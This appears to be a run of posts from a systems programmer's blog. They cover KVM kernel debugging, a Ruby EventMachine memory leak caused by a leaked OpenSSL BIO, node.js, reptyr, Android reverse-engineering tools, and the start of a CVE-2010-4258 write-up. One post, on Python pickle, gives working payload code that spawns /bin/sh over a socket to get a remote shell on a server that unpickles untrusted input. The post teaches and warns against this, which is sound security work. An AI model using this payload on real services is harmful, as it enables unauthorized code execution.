Freeing unused kernel memory: 1300K (ffff8800014bb000 - ffff880001600000)
Hello, world!
ACPI: Preparing to enter system sleep state S5
reboot: Power down

(For 32-bit: You may need to pass gcc -m32 or gcc -m64 if you want to build binaries for a different bittedness than your host)

Kernel debugging with gdb

Add -s to your KVM command line. Once the VM is running, you can attach gdb via:

$ gdb vmlinux
(gdb) set architecture  i386:x86-64
(gdb) target remote :1234

You can now set breakpoints, inspect memory, single-step, all that goodness, without ever having to think the letters "kgdb".

You can step seamlessly between userspace and kernelspace, although getting symbols for everything may be tricky (Let me know if you figure out a good way to make gdb manage everything). I'm not aware of a good way to use gdb to inspect physical memory, or the virtual address space of non-running processes. If you need that, it may be worth playing with KVM/qemu's own built-in console, although I have no expertise with that myself.

(For 32-bit: You may need "set architecture i386" instead, for a 32-bit target. If your host is 32-bit, you may need the gdb-multiarch package to debug a 64-bit target)

Appendix: Kernel config in detail

The .config file I'm using was generated by starting with make allnoconfig and adding in the following options. I've attached explanations to some of them.

  • CONFIG_BLK_DEV_INITRD For booting test programs in an initrd.
  • CONGIG_BLK_DEV_RAM Required for initrd
  • CONFIG_SMP Nearly every computer is SMP these days, so let's build for testing on SMP.
  • CONFIG_PCI Virtio all runs over fake PCI devices
  • CONFIG_BINFMT_SCRIPT We really need ELF and shebang support.
  • CONFIG_IA32_EMULATION Optional, but being able to run 32-bit binaries can be useful for testing.
  • CONFIG_FILE_LOCKING dpkg and and many other essential userspace tools need file locking.
  • CONFIG_NET_9P Virtual 9P networking device
  • CONFIG_VIRTIO_PCI Support virtio PCI devices
  • CONFIG_9P_FS Support 9P-based filesystem exports.
  • CONFIG_EXT4_USE_FOR_EXT23 ext2/3/4 support for the root
  • CONFIG_TMPFS Needed for udev
  • CONFIG_INOTIFY_USER Needed for udev
  • CONFIG_VIRTIO_BLK Needed for the virtio HDD
  • CONFIG_VIRTIO_CONSOLE Needed for the virtio console
  • CONFIG_DEBUG_INFO_REDUCED Build with debug symbols; _REDUCED gives significantly better build times, but still keeps key symbols around. Drop it if you're going to be doing serious kernel debugging.


  • 2014-09-23 – Added CONFIG_FILE_LOCKING, recommended kvm command instead of qemu, and mention signal=off. Thanks to Martin Kelly for the suggestions

Tracking Down a Memory Leak in Ruby’s EventMachine

At Stripe, we rely heavily on ruby and EventMachine to power various internal and external services. Over the last several months, we've known that one such service suffered from a gradual memory leak, that would cause its memory usage to gradually balloon from a normal ~50MB to multiple gigabytes.

It was easy enough to work around the leak by adding monitoring and restarting the process whenever memory usage grew too large, but we were determined to track down the root cause. Our exploration is a tour through a number of different debugging tools and techniques, so I thought I would share it here.

Checking for ruby-level leaks

One powerful technique for tracking down tough memory leaks is post-mortem analysis. If our program's normal memory footprint is 50MB, and we let it leak until it's using, say, 2GB, 1950/2000 = 97.5% of the program's memory is leaked objects! If we look at a core file (or, even better, a running image in gdb), signs of the leak will be all over the place.

So, we let the program leak, and, when its memory usage got large enough, failed active users over to a secondary server, and attached gdb to the bloated image.

Our first instinct in a situation like this is that our Ruby code is leaking somehow, such as by accidentally keeping a list of every connection it has ever seen. It's easy to investigate this possibility by using gdb, the Ruby C API, and the Ruby internal GC hooks:

(gdb) p rb_eval_string("GC.start")
$1 = 4
(gdb) p rb_eval_string("$gdb_objs = 0")
$2 = 991401552
(gdb) p rb_eval_string("ObjectSpace.each_object {|o| $gdb_objs[o.class] += 1}")
$3 = 84435
(gdb) p rb_eval_string("$stderr.puts($gdb_objs.inspect)")
$4 = 4

Calling rb_eval_string lets us inject arbitrary ruby code into the running ruby process, from within gdb. Using that, we first trigger a GC – making sure that any unreferenced objects are cleaned up – and then walk the Ruby ObjectSpace, building up a census of which Ruby objects exist. Looking at the output and filtering for the top objects, we find:

String => 26399
Array  => 8402
Hash   => 2161
Proc   => 608

Just looking at those numbers, my gut instinct is that nothing looks too out of whack. Running some back-of-the-envelope numbers confirms this instinct:

  • In total, that's about 40,000 objects for those object types.
  • We're looking for a gradual leak, so we expect lots of small objects. Let's guess that "small" is around 1 kilobyte.
  • 40,000 1k objects is only 40MB. Our process is multiple GB at this point, so we are nowhere near explaining our memory usage.

It's possible, of course, that one of those Strings has been growing without bound, and is now billions of characters long, but that feels unlikely. A quick survey of String lengths using ObjectSpace would confirm that, but we didn't even bother at this point.

Searching for C object leaks

So, we've mostly ruled out a Ruby-level leak. What now?

Well, as mentioned, 95+% of our program's memory footprint is leaked objects. So if we just take a random sample of bits of memory, we will find leaked objects with very good probability. We generate a core file in gdb:

(gdb) gcore leak.core
Saved corefile leak.core

And then look at a random page (4k block) of the core file:

$ off=$(($RANDOM % ($(stat -c "%s" leak.core)/4096)))
$ dd if=leak.core bs=4096 skip=$off count=1 | xxd
0000000: 0000 0000 0000 0000 4590 c191 3a71 b2aa  ........E...:q..

Repeating a few times, we notice that most of the samples include what looks to be a repeating pattern:

00000f0: b05e 9b0a 0000 0000 0000 0000 0000 0000  .^..............
0000100: 0000 0000 0000 0000 0100 0000 dcfa 1939  ...............9
0000110: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
0000120: 0000 0000 0000 0000 d03b a51f 0000 0000  .........;......
0000130: 8000 0000 0000 0000 8100 0000 0000 0000  ................
0000140: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
0000150: 0000 0000 0000 0000 0100 0000 0100 0000  ................
0000160: 0000 0000 0000 0000 ffff ffff 0000 0000  ................
0000170: 40ef e145 0000 0000 0000 0000 0000 0000  @..E............
0000180: 0000 0000 0000 0000 0100 0000 0000 0000  ................
0000190: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
00001a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00001b0: 8000 0000 0000 0000 8100 0000 0000 0000  ................
00001c0: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
00001d0: 0000 0000 0000 0000 0100 0000 0100 0000  ................
00001e0: 0000 0000 0000 0000 ffff ffff 0000 0000  ................
00001f0: 4062 1047 0000 0000 0000 0000 0000 0000  @b.G............
0000200: 0000 0000 0000 0000 0100 0000 1b7f 0000  ................
0000210: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
0000220: 0000 0000 0000 0000 e103 0000 0000 0000  ................
0000230: 8000 0000 0000 0000 9100 0000 0000 0000  ................
0000240: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
0000250: 0000 0000 0000 0000 0100 0000 0100 0000  ................
0000260: 0000 0000 0000 0000 ffff ffff 0000 0000  ................
0000270: 50b0 350b 0000 0000 0000 0000 0000 0000  P.5.............
0000280: 0000 0000 0000 0000 0100 0000 0000 0000  ................
0000290: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
00002a0: 0000 0000 0000 0000 30de 4027 0000 0000  ........0.@'....
00002b0: 0077 7108 0000 0000 0060 7b97 b4d2 f111  .wq......`{.....
00002c0: 9000 0000 0000 0000 8100 0000 0000 0000  ................
00002d0: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
00002e0: 0000 0000 0000 0000 0100 0000 0100 0000  ................

Those ffff ffff blocks, repeated every 128 bytes, leap out at me, and 4 out of 5 samples of the core file reveal a similar pattern. It seems probable that we're leaking 128-byte objects of some sort, some field of which is -1 as a signed 32-bit integer, i.e. ffff ffff in hex.

Looking further, we also notice a repeated 00a8 5853 1b7f 0000, two lines before each ffff ffff. If you've stared at too many Linux coredumps, as I have, that number looks suspicious. Interpreted in little-endian, that is 0x00007f1b5358a800, which points near the top of the userspace portion of the address space on an amd64 Linux machine.

In fewer words: It's most likely a pointer.

The presence of an identical pointer in every leaked object suggests that the pointer most likely points to some kind of "type" object or tag, containing information about type of the leaked object. For instance, if we were leaking Ruby String objects, every one would have an identical pointer to the Ruby object that represents the `String' class. So, let's take a look:

(gdb) x/16gx 0x00007f1b5358a800
0x7f1b5358a800: 0x0000000000000401  0x00007f1b53340f24
0x7f1b5358a810: 0x00007f1b532c7780  0x00007f1b532c7690
0x7f1b5358a820: 0x00007f1b532c7880  0x00007f1b532c78c0
0x7f1b5358a830: 0x00007f1b532c74f0  0x00007f1b532c74c0
0x7f1b5358a840: 0x00007f1b532c7470  0x0000000000000000
0x7f1b5358a850: 0x0000000000000000  0x0000000000000000
0x7f1b5358a860: 0x0000000000000406  0x00007f1b5332a549
0x7f1b5358a870: 0x00007f1b532c7a40  0x00007f1b532c7a30

The first field, 0x401, contains only two bits set, suggesting some kind of flag field. After that, there are a whole bunch of pointers. Let's chase the first one:

(gdb) x/s 0x00007f1b53340f24
0x00007f1b53340f24: "memory buffer"

Great. So we are leaking … memory buffers. Thanks.

But this is actually fantastically informative, especially coupled with the one other piece of information we have: /proc/<pid>/maps for the target program, which tells us which files are mapped into our program at which addresses. Searching that for the target address, we find:

7f1b53206000-7f1b5336c000 r-xp 00000000 08:01 16697      /lib/

0x7f1b532060000x7f1b5358a800 < 7f1b5336c000, so this mapping contains our "type" object. libcrypto is the library containing OpenSSL's cryptographic routines, so we are leaking some sort of OpenSSL buffer object. This is real progress.

I am not overly familiar with libssl/libcrypto, so let's go to the source to learn more:

$ apt-get source libssl0.9.8
$ cd openssl*
$ grep -r "memory buffer" .
./crypto/err/err_str.c:{ERR_PACK(ERR_LIB_BUF,0,0)       ,"memory buffer routines"},
./crypto/asn1/asn1.h: * be inserted in the memory buffer
./crypto/bio/bss_mem.c: "memory buffer",
./README:        sockets, socket accept, socket connect, memory buffer, buffering, SSL
./doc/ssleay.txt:-  BIO_s_mem()  memory buffer - a read/write byte array that
./test/times:talks both sides of the SSL protocol via a non-blocking memory buffer

Only one of those is a string constant, so we go browse ./crypto/bio/bss_mem.c and read the docs (bio(3) and buffer(3)) a bit. Sparing you all the details, we learn:

  • OpenSSL uses the BIO structure as a generic abstraction around any kind of source or sink of data that can be read or written to.
  • A BIO has a pointer to a BIO_METHOD, which essentially contains a small amount of metadata and a vtable, describing what specific kind of BIO this is, and how to interact with it. The second field in a BIO_METHOD is a char * pointing at a string holding the name of this type.
  • One of the common types of BIOs is the mem BIO, backed directly by an in-memory buffer (a BUF_MEM). The BIO_METHOD for memory BIOs has the type tag "memory buffer".

So, it appears we are leaking BIO objects. Interestingly, we don't actually seem to be leaking the underlying memory buffers, just the BIO struct that contains the metadata about the buffer.

Tracing the source

This kind of leak has to be in some C code somewhere. Clearly nothing in pure ruby code should be able to do this. The server in question contains no C extensions we wrote, so it's probably in some third-party library we use.

A leak in OpenSSL itself is certainly possible, but OpenSSL is very widely used and quite mature, so let's assume (hope) that our leak is not there, for now.

That leaves EventMachine as the most likely culprit. Our program uses SSL heavily via the EventMachine APIs, and we do know that EventMachine contains a bunch of C/C++, which, to be frank, does not have a sterling reputation.

So, we pull up an EventMachine checkout. There are a number of ways to construct a new BIO, but the most basic and common seems to be BIO_new, sensibly enough. So let's look for that:

$ git grep BIO_new
ext/rubymain.cpp:       out = BIO_new(BIO_s_mem());
ext/ssl.cpp:    BIO *bio = BIO_new_mem_buf (PrivateMaterials, -1);
ext/ssl.cpp:    pbioRead = BIO_new (BIO_s_mem());
ext/ssl.cpp:    pbioWrite = BIO_new (BIO_s_mem());
ext/ssl.cpp:    out = BIO_new(BIO_s_mem());

Great: there are some calls (so it could be one of them!), but not too many (so we can reasonably audit them all).

Starting from the top, we find, in ext/rubymain.cpp:

static VALUE t_get_peer_cert (VALUE self, VALUE signature)
    VALUE ret = Qnil;
    X509 *cert = NULL;
    BUF_MEM *buf;
    BIO *out;

    cert = evma_get_peer_cert (NUM2ULONG (signature));

    if (cert != NULL) {
        out = BIO_new(BIO_s_mem());
        PEM_write_bio_X509(out, cert);
        BIO_get_mem_ptr(out, &buf);
        ret = rb_str_new(buf->data, buf->length);

    return ret;

The OpenSSL APIs are less than perfectly self-descriptive, but it's not too hard to puzzle out what's going on here:

We first construct a new BIO backed by a memory buffer:

out = BIO_new(BIO_s_mem());

We write the certificate text into that BIO:

PEM_write_bio_X509(out, cert);

Get a pointer to the underlying BUF_MEM:

BIO_get_mem_ptr(out, &buf);

Convert it to a Ruby string:

ret = rb_str_new(buf->data, buf->length);

And then free the memory:


But we've called the wrong free function! We're freeing buf, which is the underlying BUF_MEM, but we've leaked out, which is the BIO itself we also allocated. This is exactly the kind of leak we saw in our core dump!

Continuing our audit, we find the exact same bug in ssl_verify_wrapper in ssl.cpp. Reading code, we learn that t_get_peer_cert is called by the Ruby function get_peer_cert, used to retrieve the peer certificate from a TLS connection, and that ssl_verify_wrapper is called if you pass :verify_peer => true to start_tls, to convert the certificate into a Ruby string for passing to the ssl_verify_peer hook.

So, any time you make a TLS or SSL connection with EventMachine and verify the peer certificate, EventMachine was leaking 128 bytes! Since it's presumably pretty rare to make a large number of SSL connections from a single Ruby process, it's not totally surprising that no one had caught this before.

Having found the issue, the fix was simple, and was promptly merged upstream.

Why node.js Is Cool (It’s Not About Performance)

For the past N months, it seems like there is no new technology stack that is either hotter or more controversial than node.js. node.js is cancer! node.js cures cancer! node.js is bad ass rock star tech!. I myself have given node.js a lot of shit, often involving the phrase "explicit continuation-passing style."

Most of the arguments I've seen seem to center around whether node.js is "scalable" or high-performance, and the relative merits of single-threaded event loops versus threading for scaling out, or other such noise. Or how to best write a Fibonacci server in node.js (wat?).

I am going to completely ignore all of that (and I think you should, too!), and argue that node.js is in fact on to something really cool, and is worth using and thinking about, but for a reason that has absolutely nothing to do with scalability or performance.

The Problem

node.js is cool because it solves a problem shared by virtually every mainstream language. That problem is the fact that, as long as "ordinary" blocking code is the default, it is difficult and unnatural to write networked code in a way that it can be combined with other network code, while allowing them to interact.

In most languages/environments – virtually every other language people use today – when you write networked code, you can either make it fully blocking itself, and implement your own main loop – which is almost always easiest – or you can pick your favorite event loop library (you probably have half a dozen choices), and write your code around that. If you do the latter, not only will your code likely be more awkward than if you chose the blocking main loop approach, but your only reward for the effort is that your code is combinable with the small fraction of other code that also chose the same event loop library.

The upshot of this situation is that if you pick a couple of random networked libraries written by different people – let's say, an HTTP server, a Twitter client, and an IRC client, for example – and want to combine them – maybe you want a Twitter <-> IRC bridge with a web-based admin panel – you will end up at best having to write some awkward glue code, and at worst doing something truly hackish in order to make them communicate at all.

(In case you're not convinced about the existence or scope of this problem, you can detour ahead to the optional example of how this problem manifests with typical Python libraries)

Enter node.js

node.js solves this problem, somewhat paradoxically by reducing the number of options available to developers. By having a built-in event loop, and by making that event loop the default way to accomplish virtually anything at all (e.g. all of the builtin IO functions work asynchronously on the same event loop), node.js provides a very strong pressure to write networked code in a certain way. The upshot of this pressure is that, since essentially every node.js library works this way, you can pick and choose arbitrary node.js libraries and combine them in the same program, without even having to think about the fact that you're doing so.

node.js is cool, then, not for any performance or scalability reasons, but because it makes composable networked components the default.

Concluding Notes

An interesting point here is that there is not really any fundamental differences between what you can do in Python and node.js. The Twisted project, for example, is basically an attempt to implement the node.js ideology in Python (yes, I'm being terribly anachronistic describing it that way). Twisted, however, has a fairly steep learning curve, and "feels" unnatural to developers used to writing "normal" Python, and so relatively few libraries get written for the Twisted environment, compared to the rest of the Python ecosystem. Twisted suffers from the fact that the Python language and Python community are not set up to make Twisted the default way to do things.

The key is that node.js makes it, both technically and socially, easier to write code in this composable way than not to do so. The built-in event loop and nonblocking primitives make it technically easy, and the social culture that has grown up around it discourages libraries that don't work this way, so libraries that attempt to just block for IO are looked down on and are unlikely to thrive and gain adoption and development resources.

I'm also not ignoring the downside of the node.js style – the potentially convoluted callback-based style, the risk of bringing the whole world to a halt with an accidental blocking call, the single-threaded model that makes it hard to effectively exploit multiple cores. node.js definitely makes you do more work than you might otherwise have to, in many circumstances. But the key is, in exchange for this work, you get something really cool – and something much more valuable, in my opinion, than nebulous performance gains.

I also don't want to claim that node.js is the only system, or the only technical approach, that makes this property possible. But node.js is the most successful such system I know of, and that's worth at least as much as the technical possibility – what's the use of being able to combine third-party libraries, if no one has written anything worth using in the first place?

And similarly, while the single-threaded callback model may not be the best possible model, it seems to have hit some sweet spot for finding a sweet spot in terms of what developers are willing to put up with. Certainly, people are writing node.js code like mad – check out the npm registry for a partial list.

So, node.js is not magic, and it definitely doesn't cure cancer. But there is something here worth looking at. The next time you need to glue some unrelated networked services together, give node.js a shot – I think you'll like it. And if you're still not convinced, glue a quick HTTP frontend onto whatever you've created. I promise you'll be shocked by how easy it is.

Postscript - A Python Example

As an optional addendum, here's a step-by-step discussion of how just bad the situation is in most other languages.

Let's imagine we want to write a trivial Jabber -> IRC bridge: A bot that lurks in an IRC channel, and signs on to Jabber, and sends all the messages it receives on Jabber into the IRC channel. This is the kind of simple problem that can be described in one sentence, and sounds like it should take all of 20 lines of code, but actually turns out to be rather a nuisance.

Python has, by this point, a great library ecosystem, so we happily start googling, and find the plausible looking python-irclib and xmpppy libraries. Great. So, what does code in each of those look like? Well, in python-irclib, we construct a subclass of SingleServerIRCBot, and call the start function, which runs the IRC main loop:

bot = MyBot(channel, nickname, server, port)

And in xmpppy, we construct an xmpp.Client object, and call Client.Process in a loop, with a timeout:

conn = xmpp.Client(server)
# connect to the server
while True:

Ok, so, we launch a thread for each one, and a few minutes of fumbling later, we're connected to both Jabber and IRC. So far, so good. We're using Python's threads, which will inevitably bring us a world of pain, but I'll ignore that for now, since a better threading implementation could fix most of the pain.

But now, what do we do when we receive a Jabber message? We want to send a message out the python-irclib instance, but how do we do that? python-irclib isn't thread safe, so we can't just call .send() from the Jabber thread. Ok, so we add in a Queue.Queue, and have the Jabber thread push messages onto it.

Now we just need to make the IRC thread fetch messages from this queue. But how do we do that? The IRC thread is blocked somewhere deep inside python-irclib, waiting for network traffic. How do we wake it up to read messages from the queue? The easiest way is to switch from calling start to calling process_once in a loop with a short timeout.

This will work, and we'll eventually get something working, but now we're forced into polling, with all the annoying latency/CPU tradeoffs that entails, and also half of our code so far has just been spent gluing these two libraries together.

In node.js, on the other hand, we'd just instantiate client objects for both protocols, set up some event handlers, and … well, that's about it. Because everything's hooked into the same main loop, they'll Just Work together, and because we're all running single-threaded, we can mostly just communicate directly between the two libraries without having to think too hard about race conditions or anything.

The point, of course, is not that this is impossible to write this program in Python. It is, and I've done it, and it's not that terrible. But any option you take will involve some annoying tradeoffs, and will involve making lots of irrelevant plumbing decisions about how to make your pieces play well together. And compared to all that, node.js feels like a breeze.

BlackHat/DEFCON 2011 Talk: Breaking Out of KVM

I've posted the final slides from my talk this year at DEFCON and Black Hat, on breaking out of the KVM Kernel Virtual Machine on Linux.

Virtunoid: Breaking out of KVM from Nelson Elhage

[Edited 2011-08-11] The code is now available. It should be fairly well-commented, and include links to everything you'll need to get the exploit up and running in a local test environment, if you're so inclined.

In addition, as I mentioned, this bug was found by a simple KVM fuzzer I wrote. I'm also going to clean that up and release it, but don't expect it too soon.

I had a great time meeting lots of interesting people at BlackHat and DEFCON, some that I'd met online and others I hadn't. If any of you are ever in Boston, drop me a note and we can grab a beer or something.

Exploiting Misuse of Python’s “Pickle”

If you program in Python, you're probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you're also familiar with the warning printed prominently near the start of pickle's documentation:

Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Recently, however, I stumbled upon a project that was accepting and unpacking untrusted pickles over the network, and a poll of some friends revealed that few of them were aware of just how easy it is to exploit a service that does this. As such, this blog post will describe exactly how trivial it is to exploit such a service, using a simplified version of the code I recently encountered as an example. Nothing in here is novel, but it's interesting if you haven't seen it.

The Target

The vulnerable code was a Twisted server that listened over SSL. The code looked roughly like the following:

class VulnerableProtocol(protocol.Protocol):
  def dataReceived(self, data):

     # Code to actually parse incoming data according to an
     #  internal state machine
     # If we just finished receiving headers, call verifyAuth() to
       check authentication

  def verifyAuth(self, headers):
      token = cPickle.loads(base64.b64decode(headers['AuthToken']))
      if not check_hmac(token['signature'], token['data'], getSecretKey()):
        raise AuthenticationFailed
      self.secure_data = token['data']
      raise AuthenticationFailed

So, if we just send a request that looks something like:

AuthToken: <pickle here>

The server will happily unpickle it.

Executing Code

So, what can we do with that? Well, pickle is supposed to allow us to represent arbitrary objects. An obvious target is Python's subprocess.Popen objects – if we can trick the target into instantiating one of those, they'll be executing arbitrary commands for us! To generate such a pickle, however, we can't just create a Popen object and pickle it; For various mostly-obvious reasons, that won't work. We could read up on the "pickle" format and construct a stream by hand, but it turns out there is no need to.

pickle allows arbitrary objects to declare how they should be pickled by defining a __reduce__ method, which should return either a string or a tuple describing how to reconstruct this object on unpacking. In the simplest form, that tuple should just contain

  • A callable (which must be either a class, or satisfy some other, odder, constraints), and
  • A tuple of arguments to call that callable on.

pickle will pickle each of these pieces separately, and then on unpickling, will call the callable on the provided arguments to construct the new object.

And so, we can construct a pickle that, when un-pickled, will execute /bin/sh, as follows:

import cPickle
import subprocess
import base64

class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh',),))

print base64.b64encode(cPickle.dumps(RunBinSh()))

Getting a Remote Shell

At this point, we've basically won. We can run arbitrary shell commands on the target, and there are any number of ways we could bootstrap from here up to an interactive shell and whatever else we might want.

For completeness, I'll explain what I did, since it's a moderately cute trick. subprocess.Popen lets us select which file descriptors to attach to stdin, stdout, and stderr for the new process by passing integers for the stdin and similarly-named arguments, so we can open our /bin/sh on arbitrarily-numbered fd's.

However, as mentioned above, the target server uses Twisted, and it serves all requests in the same thread, using an asynchronous event-driven model. This means we can't necessarily predict which file descriptor on the server will correspond to our socket, since it depends on how many other clients are connected.

It also means, however, that every time we connect to the server, we'll open a new socket inside the same server process. So, let's guess that the server has fewer than, say, 20 concurrent connections at the moment. If we connect to the server's socket 20 times, that will open 20 new file descriptors in the server. Since they'll get assigned sequentially, one of them will almost certainly be fd 20. Then, we can generate a pickle like so, and send it over:

import cPickle
import subprocess
import base64

class Exploit(object):
  def __reduce__(self):
    fd = 20
    return (subprocess.Popen,
            (('/bin/sh',), # args
             0,            # bufsize
             None,         # executable
             fd, fd, fd    # std{in,out,err}

print base64.b64encode(cPickle.dumps(Exploit()))

We'll open a /bin/sh on fd 20, which should be one of our 20 connections, and if all goes well, we'll see a prompt printed to one of those. We'll send some junk on that fd until we manage to get the original server to error out and close the connection, and we'll be left talking to /bin/sh over a socket. Game over.

In Conclusion

Again, nothing here should be novel, nor would I expect any of these pieces to take a competent hacker more than few minutes to figure out, given the problem. But if this blog post teaches someone not to use pickle on untrusted data, then it will be worth it.

Reptyr: Changing a Process’s Controlling Terminal

reptyr (announced recently on this blog) takes a process that is currently running in one terminal, and transplants it to a new terminal. reptyr comes from a proud family of similar hacks, and works in the same basic way: We use ptrace(2) to attach to a target process and force it to execute code of our own choosing, in order to open the new terminal, and dup2(2) it over stdout and stderr.

The main special feature of reptyr is that it actually changes the controlling terminal of the target process. The "controlling terminal" is a concept maintained by UNIX operating systems that is independent of a process's file descriptors. The controlling terminal governs details like where ^C gets delivered, and how applications are notified of changes in window size.

Processes are grouped into two levels of hierarchical groups: sessions, and process groups. Each group is named by an ID, which is the PID of the initial leader (either "session leader" or "process group leader"). Even if the leader exits, that number is still the ID for the group. Sessions are used for terminal management – Every process in a session has the same controlling terminal, and each terminal belongs to at most one session. Process groups are a sub-division within sessions, and are used primarily for job control within the shell. For a more in-depth explanation, see part 3 of my earlier series on termios.

If you check out tty_ioctl(4), you'll find that Linux has an ioctl, TIOCSCTTY, that can be used to set the controlling terminal of a process, and you could be forgiven for thinking that all we need is to make the target call that ioctl, and we're done.

However, if we read closer, we find that it has several restrictions. In particular:

The calling process must be a session leader and not have a controlling terminal already. If this terminal is already the controlling terminal of a different session group then the ioctl fails with EPERM […]

In the typical case, where I'm trying to attach a (say) mutt that you spawned from your shell, mutt won't be a session leader – your shell will be the session leader, and mutt will be the process group leader for a process group containing only itself.

So, we need to make the target a session leader. Conveniently, there's a system call for that: setsid(2).

However, reading that man page, we find a new caveat: setsid(2) fails with EPERM if

The process group ID of any process equals the PID of the calling process. Thus, in particular, setsid() fails if the calling process is already a process group leader.

The shell creates a new process group for every job you launch, and so our target mutt will be a process group leader, and unable to setsid(). The usual solution for programs that want to setsid is to fork(), so that the child is still in the parent's session and process group, and then setsid() in the child. However, fork()ing our mutt and killing off the parent seems potentially disruptive, so let's see if we can avoid that.

So, we're going to need to change mutt's process group ID, so that there are no processes with process group IDs equal to its PID. Following some trusty SEE ALSO links, we get to setpgid(2). There's a bunch of text in that man page, but the key bit is:

If setpgid() is used to move a process from one process group to another, both process groups must be part of the same session (see setsid(2) and credentials(7)). In this case, the pgid specifies an existing process group to be joined and the session ID of that group must match the session ID of the joining process.

We need to find a process group in the same session as mutt to move our mutt into, and then we'll be able to setsid. We could try to find one – the shell is a plausible candidate, for instance – but there's an alternate, more direct route: Create one.

While we have mutt captured with ptrace, we can make it fork(2) a dummy child, and start tracing that child, too. We'll make the child setpgid to make it into its own process group, and then get mutt to setpgid itself into the child's process group. mutt can then setsid, moving into a new session, and now, as a session leader, we can finally ioctl(TIOCSCTTY) on the new terminal, and we win.

It turns out I didn't invent this technique – injcode and neercs work the same way. But I did discover it independently of them, and it was a fun little hunt through unix arcana.

Reptyr: Attach a Running Process to a New Terminal

Over the last week, I've written a nifty tool that I call reptyr. reptyr is a utility for taking an existing running program and attaching it to a new terminal. Started a long-running process over ssh, but have to leave and don't want to interrupt it? Just start a screen, use reptyr to grab it, and then kill the ssh session and head on home.

You can grab the source, or read on for some more details.

There's a shell script called screenify that's been going around the internet for nigh on 10 years now that is supposed to use gdb to accomplish the same thing. There's also a project called retty that tries to do the same thing, in C using ptrace() directly.

The difference between those programs and reptyr is that reptyr works much, much, better.

If you attach a less using screenify or retty, it will still take input from the old terminal. If you attach an ncurses program, and resize the window, the program probably won't resize correctly. ^C and ^Z will still be processed on the old terminal – typing them in the new terminal won't do anything useful.

reptyr fixes all of these problems and more, and is the only such tool I know of that does so. I've never seen a program that doesn't behave noticeably incorrectly after attaching with retty or screenify, whereas with reptyr most programs I have tried work flawlessly.

How does it work?

reptyr works in the same basic way as screenify and retty – it attaches to the target process using the ptrace API, opens the new terminal, and dup2s it over the old file descriptors. It also copies the termios settings from the old terminal to the new terminal.

The main thing that reptyr does that no one else does is that it actually changes the controlling terminal of the process you are attaching. This is the detail that makes many things Just Work, including ^C and ^Z and window resizing.

Switching the target's controlling terminal is not easy and involves a fair bit of trickery with ptrace and Linux's terminal APIs. I will probably do another blog post some time about the dirty details of how I make this work, but for now you can check out attach.c if you really want to know.

reptyr still has a number of limitations – it doesn't generally work, for example, if the target process has any children. I know how to fix most of these problems, though, so expect it to get better with time. Please let me know if you find it useful!


(Edited to add:) Nothing is really new. A commenter on reddit pointed out that injcode and neercs both accomplish the same thing, even using the same trick to change the CTTY. Ah well, I had run writing it anyways, and apparently I wasn't the only one who didn't know about the existing alternatives. neercs is a full screen replacement, though, and I think that reptyr should be more robust than injcode – I use a different techique for ptrace-hijacking, for example – and so hopefully this tool still has a niche as a more robust standalone utility. Certainly, judging from the amount of enthusiasm I've seen for this tool, this still isn't a problem that is solved to the average user's satisfaction.

Some Android Reverse-engineering Tools

I've spent a lot of time this last week staring at decompiled Dalvik assembly. In the process, I created a couple of useful tools that I figure are worth sharing.

I've been using dedexer instead of baksmali, honestly mainly because the former's output has fewer blank lines and so is more readable on my netbook's screen. Thus, these tools are designed to work with the output of dedexer, but the formats are simple enough that they should be easily portable to smali, if that's your tool of choice (And it does look like a better tool overall, from what I can see).


I'm an emacs junkie, and I can't stand it when I have to work with a file that doesn't have an emacs mode. So, a day into staring at un-highlighted .ddx files in fundamental-mode, I broke down and threw together ddx-mode. It's fairly minimal, but it provides functional syntax highlighting, and a little support for navigating between labels. One cute feature I threw in is that, if you move the point over a label, any other instances of that label get highlighted, which I found useful in keeping track of all the "lXXXXX" labels dedexer generates.


Dalvik assembly is, on the whole pretty easy to read, but occasionally you stumble on huge methods that clearly originated from multiple nested loops and some horrible chained if statements. And what you'd really like is to be able to see the structure of the code, as much as the details of the instructions.

To that end, I threw together a Python script that "parses" .ddx files, and renders them to a control-flow graph using dot. As an example, the parseToken method from the IMAP parser in the k9mail application for Android looks like the following, when disassembled and rendered to a CFG:

I use the term "parses" because it's really just a pile of regexes, line.split() and line.startswith("..."), but it gets the job done, so I hope it might be of use to someone else. The biggest missing feature is that it doesn't parse catch directives, so those just end up floating out to the side as unattached blocks.

You'll also notice the rounded "return" blocks – either javac or dx merges all exits from a function to go through the same return block, but I found that preserving that feature in the CFG produces a lot of clutter and makes it hard to read, so I lift every edge that would go to that common block to go to a separate block.


Both tools live in my "reverse-android" repository on github, and are released under the MIT license. Please feel free to do whatever you want with them, although I'd appreciate it if you let me know if you make any improvements or find them useful.

CVE-2010-4258: Turning Denial-of-service Into Privilege Escalation

Dan Rosenberg recently released a privilege escalation bug for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I'm going to do a brief tour of the various kernel features that collided to make this bug possible, and explain how they combine to turn an otherwise-boring oops into privilege escalation.


When a user application passes a pointer to the kernel, and the kernel wants to read or write from that pointer, the kernel needs to perform various checks that a buggy or malicious userspace app hasn't passed an "evil" pointer.

Because the kernel and userspace run in the same address space, the most important check is simply that the pointer points into the "userspace" part of the address space. User applications are protected by page table permissions from writing into kernel memory, but the kernel isn't, and so must explicitly check that any pointers given to it by a user don't point into the kernel region.

The address space is laid out such that user applications get the bottom portion, and the kernel gets the top, so this check is a simple comparison against that boundary. The kernel function that performs this check is called access_ok, although there are various other functions that do the same check, implicitly or otherwise.

get_fs() and set_fs()

Occasionally, however, the kernel finds it useful to change the rules for what access_ok will allow. set_fs()1 is an internal Linux function that is used to override the definition of the user/kernel split, for the current process.

